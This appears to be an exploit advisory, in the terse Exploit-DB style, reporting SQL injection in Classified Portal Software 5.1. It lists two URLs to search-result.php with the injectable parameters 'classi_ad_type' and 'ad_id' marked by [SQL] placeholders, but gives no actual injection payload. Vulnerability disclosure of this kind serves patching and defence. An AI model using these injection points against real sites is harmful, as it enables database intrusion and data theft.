20 lines
No EOL
824 B
Text
20 lines
No EOL
824 B
Text
# # # # #
|
|
# Exploit Title: Classified Portal Software 5.1 - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 11.04.2017
|
|
# Vendor Homepage: http://www.myclassifiedscript.com/
|
|
# Software: http://www.myclassifiedscript.com/demo.html
|
|
# Demo: http://www.clpage.com/
|
|
# Version: 5.1
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# #ihsansencan
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/search-result.php?keyword=&ad_id=222&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=[SQL]&sub.x=46&sub.y=8&searchkey=search_record
|
|
# http://localhost/[PATH]/search-result.php?keyword=&ad_id=[SQL]&cat_level_root=4&cat_level_one=&cat_level_two=&classi_ad_type=&sub.x=46&sub.y=8&searchkey=search_record
|
|
# Etc...
|
|
# # # # # |